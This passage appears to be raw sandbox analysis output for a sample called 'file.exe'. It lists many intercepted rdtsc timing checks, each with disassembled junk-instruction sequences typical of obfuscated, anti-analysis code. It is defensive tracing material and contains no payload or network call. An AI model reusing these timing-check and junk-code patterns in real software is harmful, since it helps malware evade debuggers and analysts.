                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9DF2A second address: F9DF2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9DF2E second address: F9DF38 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F389CFCC946h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9D9D8 second address: F9D9E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9E2A8 second address: F9E2AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9E2AC second address: F9E2EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F389C838398h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 mov dx, 98E6h 0x00000028 lea eax, dword ptr [ebp+12491CECh] 0x0000002e mov edx, dword ptr [ebp+122D3741h] 0x00000034 push eax 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FED4F3 second address: FED4F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FED67E second address: FED6A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F389C8383A7h 0x0000000c jnc 00007F389C838396h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FED6A4 second address: FED6A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FED6A9 second address: FED6DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jno 00007F389C838396h 0x00000009 pop eax 0x0000000a jmp 00007F389C8383A9h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jc 00007F389C8383AEh 0x00000017 push edi 0x00000018 pushad 0x00000019 popad 0x0000001a pop edi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FED6DC second address: FED6E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEDB4E second address: FEDB53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEDCC7 second address: FEDCCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEDE1A second address: FEDE20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEDE20 second address: FEDE68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F389CFCC94Ch 0x0000000b jmp 00007F389CFCC958h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007F389CFCC959h 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007F389CFCC951h 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEDE68 second address: FEDE73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F389C838396h 0x0000000a pop eax 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEDE73 second address: FEDE78 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEDE78 second address: FEDE96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 jmp 00007F389C8383A6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF2BC1 second address: FF2BC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF5176 second address: FF517A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF517A second address: FF51A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389CFCC955h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jc 00007F389CFCC946h 0x00000010 jg 00007F389CFCC946h 0x00000016 pop edx 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF51A1 second address: FF51B1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F389C83839Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFA7BC second address: FFA7D0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jnp 00007F389CFCC948h 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFAC2E second address: FFAC36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFAD9E second address: FFADA9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFADA9 second address: FFADCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F389C8383A3h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFADCD second address: FFADEF instructions: 0x00000000 rdtsc 0x00000002 js 00007F389CFCC946h 0x00000008 jg 00007F389CFCC946h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 jmp 00007F389CFCC94Bh 0x00000019 pushad 0x0000001a popad 0x0000001b pop edi 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFADEF second address: FFADFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007F389C838396h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9DD93 second address: F9DD98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFBA49 second address: FFBA67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389C8383A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFBA67 second address: FFBA6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFEFC8 second address: FFEFE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F389C83839Eh 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFEFE5 second address: FFEFE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFEFE9 second address: FFEFF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F389C83839Eh 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFEFF9 second address: FFEFFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFEFFD second address: FFF01D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389C8383A8h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFF6E2 second address: FFF6E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFF6E6 second address: FFF6EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F65F9D second address: F65FA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100246A second address: 1002470 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1002470 second address: 1002474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1002474 second address: 1002478 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1002478 second address: 1002492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push esi 0x0000000c jmp 00007F389CFCC94Ah 0x00000011 pop esi 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10025DF second address: 1002601 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F389C8383A7h 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10027D8 second address: 10027F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389CFCC959h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10027F5 second address: 1002815 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F389C8383A5h 0x00000008 jno 00007F389C838396h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100BCBE second address: 100BCC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100BCC4 second address: 100BCC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100BCC9 second address: 100BCCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100BCCF second address: 100BCD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A09A second address: 100A0AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007F389CFCC946h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A33E second address: 100A344 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A634 second address: 100A644 instructions: 0x00000000 rdtsc 0x00000002 js 00007F389CFCC946h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A644 second address: 100A648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A648 second address: 100A680 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389CFCC94Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F389CFCC953h 0x00000014 pop ecx 0x00000015 jmp 00007F389CFCC94Ch 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A680 second address: 100A68A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F389C83839Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100AC1F second address: 100AC39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F389CFCC951h 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100AC39 second address: 100AC59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F389C8383A1h 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100B1F4 second address: 100B1F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100B1F9 second address: 100B1FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100B7B1 second address: 100B7B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100B7B5 second address: 100B7C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FB9D second address: 100FBA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007F389CFCC946h 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FBA9 second address: 100FBAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100EF21 second address: 100EF40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F389CFCC954h 0x0000000a pop esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100EF40 second address: 100EF44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100EF44 second address: 100EF48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100EF48 second address: 100EF4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100EF4E second address: 100EF64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F389CFCC94Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100F0C7 second address: 100F0EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jne 00007F389C838396h 0x0000000d jmp 00007F389C8383A1h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100F893 second address: 100F8A2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F389CFCC946h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100F8A2 second address: 100F8AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101AAD0 second address: 101AADA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101AADA second address: 101AAE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F389C838396h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101AAE4 second address: 101AB05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F389CFCC953h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F389CFCC946h 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101B041 second address: 101B0AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F389C8383A6h 0x00000009 jp 00007F389C838396h 0x0000000f popad 0x00000010 pushad 0x00000011 jc 00007F389C838396h 0x00000017 jmp 00007F389C83839Fh 0x0000001c jmp 00007F389C8383A5h 0x00000021 popad 0x00000022 pushad 0x00000023 jmp 00007F389C8383A3h 0x00000028 jo 00007F389C83839Ch 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101B394 second address: 101B398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101B398 second address: 101B3B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389C8383A1h 0x00000007 jne 00007F389C838396h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101B6E8 second address: 101B748 instructions: 0x00000000 rdtsc 0x00000002 je 00007F389CFCC946h 0x00000008 jmp 00007F389CFCC954h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F389CFCC958h 0x00000014 pushad 0x00000015 jmp 00007F389CFCC959h 0x0000001a push esi 0x0000001b pop esi 0x0000001c push ebx 0x0000001d pop ebx 0x0000001e popad 0x0000001f popad 0x00000020 push edx 0x00000021 pushad 0x00000022 jc 00007F389CFCC946h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101B898 second address: 101B89E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101B89E second address: 101B8A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101BA0B second address: 101BA1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F389C83839Bh 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101BA1E second address: 101BA23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101BA23 second address: 101BA49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F389C8383A6h 0x00000008 jng 00007F389C838396h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101BA49 second address: 101BA4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101BA4F second address: 101BA6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F389C838396h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f je 00007F389C8383A2h 0x00000015 jl 00007F389C838396h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101C22B second address: 101C230 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101C230 second address: 101C245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F389C83839Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101C245 second address: 101C249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101C249 second address: 101C24F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101C24F second address: 101C255 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1021598 second address: 10215BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 jmp 00007F389C8383A4h 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007F389C838396h 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10215BD second address: 10215C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10215C1 second address: 10215E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F389C8383A7h 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1025DCD second address: 1025DD2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1025DD2 second address: 1025DFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F389C83839Dh 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F389C8383A4h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
